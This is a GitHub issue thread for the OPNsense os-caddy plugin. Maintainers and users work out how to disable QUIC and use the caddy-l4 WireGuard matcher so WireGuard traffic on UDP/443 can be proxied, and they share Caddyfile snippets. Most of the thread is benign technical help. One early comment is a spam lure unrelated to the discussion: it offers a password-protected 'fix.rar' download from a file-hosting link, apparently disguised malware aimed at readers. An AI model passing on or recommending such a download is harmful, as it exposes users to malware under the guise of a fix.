### ISSUE TITLE
www/caddy: Add option to disable QUIC so UDP/443 can be used for other services

### ISSUE THREAD

**Issue by hrvojesolc** [opnsense/plugins#4201]
**Important notices**
Before you add a new report, we ask you kindly to acknowledge the following:

- [X] I have read the contributing guide lines at https://github.com/opnsense/plugins/blob/master/CONTRIBUTING.md
- [X] I have searched the existing issues, open and closed, and I'm convinced that mine is new.
- [X] When the request is meant for an existing plugin, I've added its name to the title.

**Is your feature request related to a problem? Please describe.**
Before os-caddy, I could bind wireguard to 443 (udp). Even though wireguard has it's own protocol (not HTTPS), serving it on 443/udp allows to bypass many corporate firewalls that do not do packet inspection (most fast food chains in Ontario, Canada offering free WiFi). Caddy binds on 443/udp, presuming for QUIC HTTP/3. 

**Describe the solution you'd like**
It would be nice to use layer4 matching Wireguard protocol for reverse proxy to its native 51820/udp. I'm not sure if this is native caddy layer4 functionality or anything added specifically by os-caddy maintainers. Searches on internet such as https://github.com/mholt/caddy-l4 make it seem that there is concentrated effort on this. I know Wireguard portocol isn't listed anywhere as supported by caddy, but something like "layer4.matchers.regexp" maching first packet could potentially be used to match Wireguard traffic. 

**Describe alternatives you've considered**
- Not using caddy and continue binding wireguard on 443/udp
- Using wireguard over websockets (wss) wrapper, but this is workarould for Linux clients only (not Windows or Android)
- Switch to OpenVPN (possibility of matching HTTPS traffic or SNI and reverse proxy it to native 1194/tcp port)

**Additional context**
I used to run OpenVPN on 443/tcp which was great and worked wonderfully. Testing showed that Wireguard on 443/udp worked well for my scenarios so I switched to it for performance related reasons (browsing SMB, remote display, etc). Ideally I would like to have Wireguard appear as TLS (HTTPS) traffic from internet coming into the firewall so that it cannot be filtered out by corporate firewalls, but this is likely not happening in near future. Right now I put Wireguard back to 51820/udp and will possibly install OpenVPN and try reverse proxy to it as backup for when Wiregaurd is filtered by public/corporate networks.

Thanks for this great plugin!

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Monviech** [comment]
I don't quite understand what you need from me here. 

If you need a certain traffic matcher supported, going upstream first and asking for it would be the best choice.

https://github.com/mholt/caddy-l4

The regex matcher is not supported in the GUI but you can certainly mess with it by using custom files.

https://docs.opnsense.org/manual/how-tos/caddy.html#custom-configuration-files

**Comment by hrvojesolc** [comment]
Thank you for your response. I'm new to caddy.

TLDR - It would be nice to add all the matchers that caddy-l4 supports in the GUI here: ![image](https://github.com/user-attachments/assets/17b58173-b2a0-4f75-aeb3-610107a9b929)

I'm not specifically looking for Wireguard protocol to be implemented in caddy here, just caddy's options. I wasn't sure if mholt/caddy-l4 is what is currently implemented in 2.8.4. I tried going through https://github.com/caddyserver/caddy to find out info on layer 4, but it doesn't seem to exists on any of the release notes. When I saw it used in os-caddy I started looking for info.

I'm now guessing that caddy in os-caddy plugin is using  a non-vanilla version of caddy with custom features/modules baked in. If so, it would be nice to put the version number of caddy as well as caddy features in the base of release notes here (not the changelog):
![image](https://github.com/user-attachments/assets/a4473482-82ec-4223-972f-1f44bcfa525f)

That is, can version number (2.8.4) be put into the wording into above notes as well as names of any extra features such as mholt/caddy-l4 in https://caddyserver.com/download:
![image](https://github.com/user-attachments/assets/26fe7abc-82e9-4d6a-add2-4967b9e0f453)

Doing this will make it easier to figure out how to go about testing some functionality that is not in the GUI.

Thank you again for your help and the great addition to OPNsense. I really appreciate it. I'll go on and try messing with the config files to test.

**Comment by hrvojesolc** [comment]
I've changed to title to remove Wireguard references. I know now that this is not something upstream has and I'll try to bring it up there and fiddle with custom config files manually. Thanks again.

**Comment by Monviech** [comment]
https://caddyserver.com/docs/command-line

`caddy list-modules`

That would have shown you the complete build. Since the build gets updated a lot I dont want to change the pkg description every time.

The GUI only offers matchers that I have tested. Im afraid of the support overhead of the regex matcher, unsure if adding it in the GUI is a wise choice.

Other matchers will be downstreamed over time when theyre added, the framework makes it easy to add new ones that don't need new custom fields.

**Comment by Monviech** [comment]
I implemented your feedback so the dependencies are more visible:

https://github.com/opnsense/plugins/blob/fc0bf2d9f82fe34ad511132e047fd477ba106e55/www/caddy/pkg-descr#L5-L8

**Comment by vnxme** [comment]
Hi! There is a `wireguard` matcher in caddy-l4 now. See https://github.com/mholt/caddy-l4/pull/245 for details.

**Comment by Monviech** [comment]
Awesome @vnxme I will compile and add it in the next version. Thank you!

**Comment by Monviech** [comment]
@vnxme I have one question regarding the matcher:

Can it also work like this (without specifying UDP)? Will it still match UDP traffic and proxy it as UDP traffic implicitly?

{
	layer4 {
		:443 {
			@test wireguard
			route @test {
				proxy server.local:51820
			}
		}
}

**Comment by vnxme** [comment]
@Monviech Your question is out of scope of the matcher. It is related to how server listener and proxy upstream parse specified protocol-address-port combinations.
I think you have to specify UDP for both server listener and proxy upstream, otherwise TCP is implicitly used, while WireGuard is pure UDP.

**Comment by Monviech** [comment]
@vnxme Thank you for clarifying.

**Comment by Monviech** [comment]
I have tested the wireguard matcher and it works. But it will not work inside the listener_wrapper which the layer4 implementation inside this caddy plugin currently builds on.

To allow caddy to proxy wireguard on udp/443, the following has to be added to the Caddyfile server directive to free the port from QUIC:

`protocols h1 h2`

This means the most straight forward way to solve the issue here would be an option to allow disabling QUIC with a checkbox so wireguard can bind directly to udp/443.

The actual wireguard matcher can then be added at a later time when the layer4 implementation inside this plugin gets another expansion to allow config generation outside the listener_wrapper scope.

**Comment by Monviech** [comment]
@vnxme

Normal Layer4 directive: (Does work for me. Yay)
Note: Here I explicitely have to prevent `h3` so `udp/:443` is free for layer4 matcher.

```
{
        layer4 {
                udp/:443 {
                        @wg0 wireguard
                        route @wg0 {
                                proxy udp/172.16.0.254:51820 {
                                }
                        }
                }
        }
        servers {
                protocols h1 h2
                listener_wrappers {
                        layer4 {
                                # Other matchers in here that proxy TCP protocols
                                route
                        }
                        tls
                }
        }
}

:80 {
}

:443 {
}
```

Listener Wrapper: (Does not work for me)
Note: Here I assume since sockstat shows the `h3` port listening on `udp:/443`, that this UDP traffic would hit the `listener_wrappers` too, and then be wireguard protocol matched and proxied to `udp/172.16.0.254:51820`.
```
{
	servers {
		listener_wrappers {
			layer4 {
				@wg0 wireguard
				route @wg0 {
					proxy udp/172.16.0.254:51820 {
					}
				}
				route
			}
			tls
		}
	}
}

:80 {
}

:443 {
}
```

```
sockstat -l | grep -i -e :443 -e :80
caddy caddy        390 8   udp46  *:443                 *:*
caddy caddy        390 16  tcp46  *:443                 *:*
caddy caddy        390 19  tcp46  *:80                  *:*
```

**Comment by Monviech** [comment]
Let's lower the scope of the issue here to disable the QUIC protocol so UDP 443 is free for Wireguard usage. We will revisit the wireguard matcher later. I still want to add it, but I first want to solve this issue here.

**Comment by hrvojesolc** [comment]
Holy moley, let me just say that I am utterly grateful for all the work you have done with Caddy. I just upgraded OPNsense to 24.7.6 and it was one great surprise after another:

1. Upon "check for updates" and getting an update notice, info on "os-caddy" had a link to [pkg-descr on github for os-caddy](https://github.com/opnsense/plugins/blob/master/www/caddy/pkg-descr) which has version numbers and all the changes listed.
2. After upgrade all services including Caddy came up fine without issues.
3. Caddy Web Server >> General Settings >> Advanced Settings – HTTP Version has HTTP/3 and they are all easily enabled disabled.
4. Caddy Web Server >> Reverse Proxy >> Layer4 Routes – Easy to match Wireguard traffic using:
`Routing Type – Global`
`Protocol – UDP`
`Matchers – Wireguard`
`Upstream Domain – <Wireguard interface IP>`
`Upstream Port – 51820`
5. Remove firewall rule on WAN for Wireguard on udp/51820 and only keep the two Caddy ones for HTTP(TCP) and HTTPS(TCP/UDP) as per default instructions on OPNsense wiki.
6. Profit

When I first opened this ticket I decided to use Caddy and replace any other reverse proxies I've had and have only the OPNsense version do certs and auth. I've put Wireguard back to udp/51820. With this I keep Wireguard on udp/51820, but remove the firewall rule and let Caddy route traffic from udp/443 to Wireguard interface internally. Super simple and great implementation.

:fire: :fire: :fire: :fire: :fire: 

Thank you so much!

**Comment by Monviech** [comment]
@hrvojesolc I'm happy it works for you. A lot of work was also done by @vnxme on the layer 4 module itself. It's nice when an effort like this is appreciated. Thank you.

**Comment by fichtner** [comment]
Interesting to see @vnxme being involved. certainly not a stranger, so hi there! :)

**Comment by vnxme** [comment]
Hi, @fichtner! Didn't expect you remember me, as a few years have passed since the last time I posted on OPNsense forum or committed to the project. Some FreeBSD limitations made me switch to another product. But I still do believe OPNsense is one of the best firewall software available on the market. And I'm really excited to see Caddy with the latest layer4 functionality available on this platform thanks to @Monviech's enormous effort. I use it myself and I'm sure the OPNsense community will warm up to its amazing features in a moment.

**Comment by fichtner** [comment]
@vnxme had some good code discussions indeed. Good times! As all things go shifting requirements require hard decisions sometimes. Just glad you are still around doing neat things regardless :)

And yes @Monviech and caddy have both been a great addition to OPNsense. Let's keep it that way. 👍 


Cheers,
Franco
